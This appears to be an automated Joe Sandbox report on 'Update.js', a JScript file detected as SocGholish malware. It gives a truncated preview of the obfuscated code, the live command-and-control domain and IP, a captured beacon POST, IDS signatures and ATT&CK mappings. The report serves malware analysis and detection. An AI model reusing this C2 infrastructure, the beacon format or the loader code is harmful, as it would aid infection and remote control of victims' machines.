Edit tour

Windows Analysis Report
Update.js

Overview

General Information

Sample Name:	Update.js
Analysis ID:	1350012
MD5:	5cff8061367f855b5386158f54eb39f7
SHA1:	5e143bdf88f4c79814910b23a58f6ed04060ef1d
SHA256:	c5e2e5af5b75b11da97e4e96e94dbc4e694ace6503e25ead473a05496e9519ec
Infos:

Detection

SocGholish

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected SocGholish

System process connects to network (likely due to code injection or exploit)

JScript performs obfuscated calls to suspicious functions

Snort IDS alert for network traffic

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Potential obfuscated javascript found

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

Uses a known web browser user agent for HTTP communication

Found WSH timer for Javascript or VBS script (likely evasive script)

Internet Provider seen in connection with other malware

Classification

Process Tree

System is w10x64

wscript.exe (PID: 6180 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Update.js	JoeSecurity_SocGholish	Yara detected SocGholish	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: wscript.exe PID: 6180	JoeSecurity_SocGholish	Yara detected SocGholish	Joe Security

Snort Signatures

ET TROJAN SocGholish CnC Domain in DNS Lookup (* .sync .oystergardens .club) - Source IP: 192.168.2.5 - Destination IP: 1.1.1.1

Timestamp:	192.168.2.51.1.1.164989532049293 11/29/23-17:42:13.526285
SID:	2049293
Source Port:	64989
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN SocGholish CnC Domain in TLS SNI (* .sync .oystergardens .club) - Source IP: 192.168.2.5 - Destination IP: 23.146.184.71

Timestamp:	192.168.2.523.146.184.71497044432049294 11/29/23-17:42:13.817351
SID:	2049294
Source Port:	49704
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

• Compliance
• Networking
• Key, Mouse, Clipboard, Microphone and Screen Capturing
• System Summary
• Data Obfuscation
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection
• Stealing of Sensitive Information
• Remote Access Functionality

Click to jump to signature section

Show All Signature Results

Source: unknown

HTTPS traffic detected: 23.146.184.71:443 -> 192.168.2.5:49704 version: TLS 1.2

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 23.146.184.71 443

Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2049293 ET TROJAN SocGholish CnC Domain in DNS Lookup (* .sync .oystergardens .club) 192.168.2.5:64989 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2049294 ET TROJAN SocGholish CnC Domain in TLS SNI (* .sync .oystergardens .club) 192.168.2.5:49704 -> 23.146.184.71:443

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

HTTP traffic detected: POST /editContent HTTP/1.1Accept: */*Upgrade-Insecure-Requests: 1Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: powvj.sync.oystergardens.clubContent-Length: 44Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

ASN Name: KRAKR1901CA KRAKR1901CA

Source: unknown

DNS traffic detected: queries for: powvj.sync.oystergardens.club

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: wscript.exe, 00000000.00000003.2108832298.0000028A4439A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2108928982.0000028A443BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2109539582.0000028A443BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: wscript.exe, 00000000.00000002.2134987151.0000028A44355000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2133012709.0000028A44355000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2109410459.0000028A44355000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2108692419.0000028A44355000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: wscript.exe, 00000000.00000003.2133745859.0000028A41BED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2108911863.0000028A41BED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2134705079.0000028A41BEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2133109915.0000028A41BE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://powvj.sync.oystergardens.club/
Source: wscript.exe, 00000000.00000002.2134640264.0000028A41BB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://powvj.sync.oystergardens.club/editContent
Source: wscript.exe, 00000000.00000003.2109282660.0000028A4439A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2108832298.0000028A4439A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://powvj.sync.oystergardens.club/editContent0z
Source: wscript.exe, 00000000.00000003.2133109915.0000028A41BB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2134640264.0000028A41BB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://powvj.sync.oystergardens.club/editContentz_
Source: wscript.exe, 00000000.00000003.2133745859.0000028A41BED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2108911863.0000028A41BED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2134705079.0000028A41BEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2133109915.0000028A41BE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://powvj.sync.oystergardens.club/l

Source: unknown

HTTPS traffic detected: 23.146.184.71:443 -> 192.168.2.5:49704 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SocGholish

Source: Yara match	File source: Update.js, type: SAMPLE
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 6180, type: MEMORYSTR

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}

Jump to behavior

Source: Update.js

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: classification engine

Classification label: mal80.troj.evad.winJS@1/0@1/1

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: setRequestHeader("Upgrade-Insecure-Requests", "1");IServerXMLHTTPRequest2.send("NfccspoUT5hqPvP65YN2LjK4scug6w3v62UDqHiRDQ==");<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html

Potential obfuscated javascript found

Source: Update.js

Initial file: High amount of function use 5

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: wscript.exe, 00000000.00000003.2133109915.0000028A41BB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2134640264.0000028A41BB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWpc
Source: wscript.exe, 00000000.00000003.2133109915.0000028A41BB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2133012709.0000028A44359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2109410459.0000028A44359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2109108957.0000028A44359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2108692419.0000028A44359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2134987151.0000028A44359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2134640264.0000028A41BB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 23.146.184.71 443

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected SocGholish

Source: Yara match	File source: Update.js, type: SAMPLE
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 6180, type: MEMORYSTR

Remote Access Functionality

Yara detected SocGholish

Source: Yara match	File source: Update.js, type: SAMPLE
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 6180, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	22 Scripting	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	22 Scripting	LSASS Memory	2 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	13 Application Layer Protocol			Data Encrypted for Impact	DNS Server	Email Addresses

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
https://powvj.sync.oystergardens.club/editContent0z	0%	Avira URL Cloud	safe
https://powvj.sync.oystergardens.club/editContent	0%	Avira URL Cloud	safe
http://www.microsoft.co	0%	Avira URL Cloud	safe
https://powvj.sync.oystergardens.club/	0%	Avira URL Cloud	safe
https://powvj.sync.oystergardens.club/l	0%	Avira URL Cloud	safe
https://powvj.sync.oystergardens.club/editContentz_	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
powvj.sync.oystergardens.club	23.146.184.71	true	true		unknown
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://powvj.sync.oystergardens.club/editContent	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://powvj.sync.oystergardens.club/l	wscript.exe, 00000000.00000003.2133745859.0000028A41BED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2108911863.0000028A41BED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2134705079.0000028A41BEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2133109915.0000028A41BE6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powvj.sync.oystergardens.club/	wscript.exe, 00000000.00000003.2133745859.0000028A41BED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2108911863.0000028A41BED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2134705079.0000028A41BEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2133109915.0000028A41BE6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powvj.sync.oystergardens.club/editContent0z	wscript.exe, 00000000.00000003.2109282660.0000028A4439A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2108832298.0000028A4439A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powvj.sync.oystergardens.club/editContentz_	wscript.exe, 00000000.00000003.2133109915.0000028A41BB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2134640264.0000028A41BB8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.co	wscript.exe, 00000000.00000003.2108832298.0000028A4439A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2108928982.0000028A443BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2109539582.0000028A443BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.146.184.71	powvj.sync.oystergardens.club	Reserved		398008	KRAKR1901CA	true

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1350012
Start date and time:	2023-11-29 17:41:24 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 2m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Without Instrumentation
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	Update.js
Detection:	MAL
Classification:	mal80.troj.evad.winJS@1/0@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .js Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded IPs from analysis (whitelisted): 40.127.169.103, 72.21.81.240, 20.166.126.56
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: Update.js

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.146.184.71	Update.js	Get hash	malicious	SocGholish	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	z1ORDENDECOMPRAURGENTEpdf.exe	Get hash	malicious	FormBook	Browse	192.229.211.108
	obaTzlGNzi.exe	Get hash	malicious	Xmrig, zgRAT	Browse	192.229.211.108
	qZTW6BQiPB.exe	Get hash	malicious	Glupteba, LummaC Stealer, RedLine, SmokeLoader, XWorm, Xmrig, zgRAT	Browse	192.229.211.108
	QYwGwyYlrX.exe	Get hash	malicious	RedLine	Browse	192.229.211.108
	45UpZOZJdh.exe	Get hash	malicious	zgRAT	Browse	192.229.211.108
	SyztrUVjX7.exe	Get hash	malicious	Glupteba, LummaC Stealer, RedLine, SmokeLoader, XWorm, Xmrig, zgRAT	Browse	192.229.211.108
	TT_20191021122413_pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	192.229.211.108
	SecuriteInfo.com.W32.MSIL_Kryptik.JQY.gen.Eldorado.24240.26222.exe	Get hash	malicious	RedLine	Browse	192.229.211.108
	RT4Rd1NAnN.doc	Get hash	malicious	Unknown	Browse	192.229.211.108
	1701159485b8f61c507373bb39fba8685e79c9a315c4b263600ff92e635b9f2a87fb55bf5b140.dat-decoded.exe	Get hash	malicious	XWorm	Browse	192.229.211.108
	TEKL#U0130F_TALEP_VE_F#U0130YAT_TEKL#U0130F#U0130_PDF.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	192.229.211.108
	OF_23204368.exe	Get hash	malicious	Snake Keylogger	Browse	192.229.211.108
	vHpbb4Bw72.exe	Get hash	malicious	Vidar, Xmrig, zgRAT	Browse	192.229.211.108
	k69S08SrKx.exe	Get hash	malicious	zgRAT	Browse	192.229.211.108
	6h5wwsQiwN.exe	Get hash	malicious	GuLoader	Browse	192.229.211.108
	SCO9.scr.exe	Get hash	malicious	zgRAT	Browse	192.229.211.108
	file2data.exe	Get hash	malicious	XWorm	Browse	192.229.211.108
	allegato_19.js	Get hash	malicious	Unknown	Browse	192.229.211.108
	allegato_895.js	Get hash	malicious	Unknown	Browse	192.229.211.108
	allegato_42.js	Get hash	malicious	Unknown	Browse	192.229.211.108

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
KRAKR1901CA	Update.js	Get hash	malicious	SocGholish	Browse	23.146.184.71
	2d8a93ed-0e7f-42eb-9baa-63d58290d598_Update.js	Get hash	malicious	Unknown	Browse	23.146.184.23
	Update.js	Get hash	malicious	Unknown	Browse	23.146.184.23
	Update.js	Get hash	malicious	Unknown	Browse	23.146.184.29
	Update.js	Get hash	malicious	Unknown	Browse	23.146.184.29
	1.js	Get hash	malicious	Unknown	Browse	23.146.184.29
	c7PZZNtiFl.elf	Get hash	malicious	Mirai	Browse	23.146.188.165
	31yJ3IUfUJ	Get hash	malicious	Mirai	Browse	23.146.186.98

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	SecuriteInfo.com.Win32.Evo-gen.25090.7913.exe	Get hash	malicious	GuLoader	Browse	23.146.184.71
	SecuriteInfo.com.Win32.Evo-gen.9086.10042.exe	Get hash	malicious	GuLoader	Browse	23.146.184.71
	MAIL_PDF65674.msi	Get hash	malicious	Unknown	Browse	23.146.184.71
	rLiquidacionporFactorizaciondeCreditos.exe	Get hash	malicious	GuLoader	Browse	23.146.184.71
	SM741AL3U8.exe	Get hash	malicious	Vidar	Browse	23.146.184.71
	nodehost_UEv2.exe	Get hash	malicious	Remcos	Browse	23.146.184.71
	localadvancedv3.exe	Get hash	malicious	Remcos	Browse	23.146.184.71
	BgService_Gap_v5.exe	Get hash	malicious	Remcos	Browse	23.146.184.71
	4.vbs	Get hash	malicious	Unknown	Browse	23.146.184.71
	cjZol9SumT.exe	Get hash	malicious	Vidar	Browse	23.146.184.71
	gCwjgRFmFP.exe	Get hash	malicious	Vidar	Browse	23.146.184.71
	SyztrUVjX7.exe	Get hash	malicious	Glupteba, LummaC Stealer, RedLine, SmokeLoader, XWorm, Xmrig, zgRAT	Browse	23.146.184.71
	7Uu5Xscq4d.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader	Browse	23.146.184.71
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	23.146.184.71
	file.exe	Get hash	malicious	Vidar	Browse	23.146.184.71
	OCCT.exe	Get hash	malicious	BazaLoader, PrivateLoader	Browse	23.146.184.71
	QGpUc9xZcU.exe	Get hash	malicious	Vidar	Browse	23.146.184.71
	2023-11-24_155912-IMGx64_Your squirrel with love.exe	Get hash	malicious	LummaC Stealer	Browse	23.146.184.71
	gbydriver.exe	Get hash	malicious	Remcos	Browse	23.146.184.71
	kft_Debug_test_v4.exe	Get hash	malicious	Remcos	Browse	23.146.184.71

File type:	ASCII text, with very long lines (5951), with no line terminators
Entropy (8bit):	5.504405724421129
TrID:
File name:	Update.js
File size:	5'951 bytes
MD5:	5cff8061367f855b5386158f54eb39f7
SHA1:	5e143bdf88f4c79814910b23a58f6ed04060ef1d
SHA256:	c5e2e5af5b75b11da97e4e96e94dbc4e694ace6503e25ead473a05496e9519ec
SHA512:	a20633ec5e6053274bc426cd2ef5772cd719f6fbb81cff2b7f9cd53d445c9f128e33d96fdfd5df1808a8ac894c02a4004cb6b09c893417f987dfaf506e8d0ae5
SSDEEP:	96:ZvymAJPiUvka0xrBcy6wrB4y/HpyxqQ3ujQhLpyoa21CE42amqywKJjkRWC2Tpfk:Zv4JtvkagBQ+0bs324QWWdTpfWdkc4JK
TLSH:	63C102919BE0A49823E76713BF3DF1E8E80D684DB670089BE5515FE02D1541BD9E6F30
File Content Preview:	//@cc_on@//@if(1){function a0_0x11d0(_0x498223,_0x559677){var _0x597f41=a0_0x597f();return a0_0x11d0=function(_0x11d095,_0xb83f82){_0x11d095=_0x11d095-0x13d;var _0x4154de=_0x597f41[_0x11d095];if(a0_0x11d0['vOSuiy']===undefined){var _0x5057c9=function(_0

File Icon


Icon Hash:	68d69b8bb6aa9a86

Network Behavior

Download Network PCAP: filtered – full

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.51.1.1.164989532049293 11/29/23-17:42:13.526285	UDP	2049293	ET TROJAN SocGholish CnC Domain in DNS Lookup (* .sync .oystergardens .club)	64989	53	192.168.2.5	1.1.1.1
192.168.2.523.146.184.71497044432049294 11/29/23-17:42:13.817351	TCP	2049294	ET TROJAN SocGholish CnC Domain in TLS SNI (* .sync .oystergardens .club)	49704	443	192.168.2.5	23.146.184.71

Network Port Distribution

Total Packets: 16
• 443 (HTTPS)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2023 17:42:13.785043955 CET	49704	443	192.168.2.5	23.146.184.71
Nov 29, 2023 17:42:13.785095930 CET	443	49704	23.146.184.71	192.168.2.5
Nov 29, 2023 17:42:13.785188913 CET	49704	443	192.168.2.5	23.146.184.71
Nov 29, 2023 17:42:13.817351103 CET	49704	443	192.168.2.5	23.146.184.71
Nov 29, 2023 17:42:13.817375898 CET	443	49704	23.146.184.71	192.168.2.5
Nov 29, 2023 17:42:14.185997963 CET	443	49704	23.146.184.71	192.168.2.5
Nov 29, 2023 17:42:14.186147928 CET	49704	443	192.168.2.5	23.146.184.71
Nov 29, 2023 17:42:14.307900906 CET	49704	443	192.168.2.5	23.146.184.71
Nov 29, 2023 17:42:14.307984114 CET	443	49704	23.146.184.71	192.168.2.5
Nov 29, 2023 17:42:14.308355093 CET	443	49704	23.146.184.71	192.168.2.5
Nov 29, 2023 17:42:14.308443069 CET	49704	443	192.168.2.5	23.146.184.71
Nov 29, 2023 17:42:14.315134048 CET	49704	443	192.168.2.5	23.146.184.71
Nov 29, 2023 17:42:14.315531015 CET	49704	443	192.168.2.5	23.146.184.71
Nov 29, 2023 17:42:14.315572023 CET	443	49704	23.146.184.71	192.168.2.5
Nov 29, 2023 17:42:22.038984060 CET	443	49704	23.146.184.71	192.168.2.5
Nov 29, 2023 17:42:22.039134026 CET	49704	443	192.168.2.5	23.146.184.71
Nov 29, 2023 17:42:22.039167881 CET	443	49704	23.146.184.71	192.168.2.5
Nov 29, 2023 17:42:22.039225101 CET	49704	443	192.168.2.5	23.146.184.71
Nov 29, 2023 17:42:22.214806080 CET	443	49704	23.146.184.71	192.168.2.5
Nov 29, 2023 17:42:22.214987993 CET	443	49704	23.146.184.71	192.168.2.5
Nov 29, 2023 17:42:22.217206001 CET	49704	443	192.168.2.5	23.146.184.71
Nov 29, 2023 17:42:22.217206001 CET	49704	443	192.168.2.5	23.146.184.71
Nov 29, 2023 17:42:22.217343092 CET	49704	443	192.168.2.5	23.146.184.71
Nov 29, 2023 17:42:22.217360020 CET	443	49704	23.146.184.71	192.168.2.5
Nov 29, 2023 17:42:22.217372894 CET	49704	443	192.168.2.5	23.146.184.71
Nov 29, 2023 17:42:22.217434883 CET	49704	443	192.168.2.5	23.146.184.71

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2023 17:42:13.526284933 CET	64989	53	192.168.2.5	1.1.1.1
Nov 29, 2023 17:42:13.761935949 CET	53	64989	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 29, 2023 17:42:13.526284933 CET	192.168.2.5	1.1.1.1	0x2e01	Standard query (0)	powvj.sync.oystergardens.club	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 29, 2023 17:42:13.761935949 CET	1.1.1.1	192.168.2.5	0x2e01	No error (0)	powvj.sync.oystergardens.club		23.146.184.71	A (IP address)	IN (0x0001)	false
Nov 29, 2023 17:42:31.587354898 CET	1.1.1.1	192.168.2.5	0x1311	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2023 17:42:31.587354898 CET	1.1.1.1	192.168.2.5	0x1311	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

powvj.sync.oystergardens.club

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	23.146.184.71	443	6180	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-29 16:42:14 UTC	420	OUT	POST /editContent HTTP/1.1 Accept: / Upgrade-Insecure-Requests: 1 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: powvj.sync.oystergardens.club Content-Length: 44 Connection: Keep-Alive Cache-Control: no-cache
2023-11-29 16:42:14 UTC	44	OUT	Data Raw: 4e 66 63 63 73 70 6f 55 54 35 68 71 50 76 50 36 35 59 4e 32 4c 6a 4b 34 73 63 75 67 36 77 33 76 36 32 55 44 71 48 69 52 44 51 3d 3d Data Ascii: NfccspoUT5hqPvP65YN2LjK4scug6w3v62UDqHiRDQ==
2023-11-29 16:42:22 UTC	165	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 32 39 20 4e 6f 76 20 32 30 32 33 20 31 36 3a 34 32 3a 32 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 29 Nov 2023 16:42:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
